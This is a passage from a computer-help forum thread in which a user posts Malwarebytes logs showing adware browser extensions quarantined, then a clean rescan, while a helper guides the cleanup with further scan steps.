    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_locales\pt_BR, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_1\_locales\pt_BR, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.1_0\_locales\en_GB, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\Default\Pepper Data\Shockwave Flash\WritableRoot\#SharedObjects\PE4PBYBY\macromedia.com, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_locales\zh_TW, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.1_0\_locales\en_US, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\fil, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_1\_locales\pt_PT, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\bg, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_metadata, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\ca, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\cs, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\da, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\de, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\el, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\en, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\es, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\sk, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\fi, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\fr, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\lv, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\nl, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\no, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\pl, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\hi, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\hr, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\ro, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\ru, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\ar, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\sl, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\sr, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\sv, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\th, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\tr, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\uk, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\vi, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\hu, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\id, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\he, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\fil, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\it, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\Default\Pepper Data\Shockwave Flash\WritableRoot\#SharedObjects\PE4PBYBY\www.iqiyi.com, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\ja, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\ko, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\lt, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\ar, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\da, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\sl, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.9_0\_locales\fil, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.1_0\_locales\fil, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_1\_locales\fil, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_locales\fil, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\ro, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\ru, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\sk, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\sr, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\es, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\sv, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\et, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\eu, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\fi, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\th, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\tr, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\fr, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\uk, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\he, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\hi, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\vi, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\el, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\cs, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\hr, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\bg, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\id, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.1_0\_locales\fil, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\it, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\ja, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\ko, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\lt, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\lv, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\ms, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\nl, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\no, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\pl, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\ca, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\de, Quarantined, [27], [325136],1.0.1506
     
  18. 2017/03/19
    scgoh123

    ...but I noticed that the MBAM log is too long (around 1210 pages in Microsoft Word). I will attach it as a Notepad txt file because it's practically impossible to copy and paste it part by part. Really sorry.

    Malwarebytes.docx
     
  19. 2017/03/19
    broni

    Please re-run MBAM one more time and post a fresh log.
    I want to make sure it removed everything.
     
  20. 2017/03/20
    scgoh123

    Malwarebytes
    www.malwarebytes.com

    -Log Details-
    Scan Date: 3/21/17
    Scan Time: 8:03 AM
    Logfile: gvh.txt
    Administrator: Yes

    -Software Information-
    Version: 3.0.6.1469
    Components Version: 1.0.75
    Update Package Version: 1.0.1550
    License: Trial

    -System Information-
    OS: Windows 8.1
    CPU: x64
    File System: NTFS
    User: ASUS\User

    -Scan Summary-
    Scan Type: Threat Scan
    Result: Completed
    Objects Scanned: 433817
    Time Elapsed: 10 min, 49 sec

    -Scan Options-
    Memory: Enabled
    Startup: Enabled
    Filesystem: Enabled
    Archives: Enabled
    Rootkits: Disabled
    Heuristics: Enabled
    PUP: Enabled
    PUM: Enabled

    -Scan Details-
    Process: 0
    (No malicious items detected)

    Module: 0
    (No malicious items detected)

    Registry Key: 0
    (No malicious items detected)

    Registry Value: 0
    (No malicious items detected)

    Registry Data: 0
    (No malicious items detected)

    Data Stream: 0
    (No malicious items detected)

    Folder: 0
    (No malicious items detected)

    File: 0
    (No malicious items detected)

    Physical Sector: 0
    (No malicious items detected)


    (end)
     
  21. 2017/03/20
    broni

    Good :)

    Re-run the Farbar Recovery Scan Tool (FRST/FRST64) you ran at the very beginning of this topic.

    • Double click to run it.
    • Make sure you checkmark the Addition.txt box.
    • Press the Scan button.
    • The scan will create two logs, FRST.txt and Addition.txt, in the same directory the tool is run from. Please copy and paste them into your reply.
     
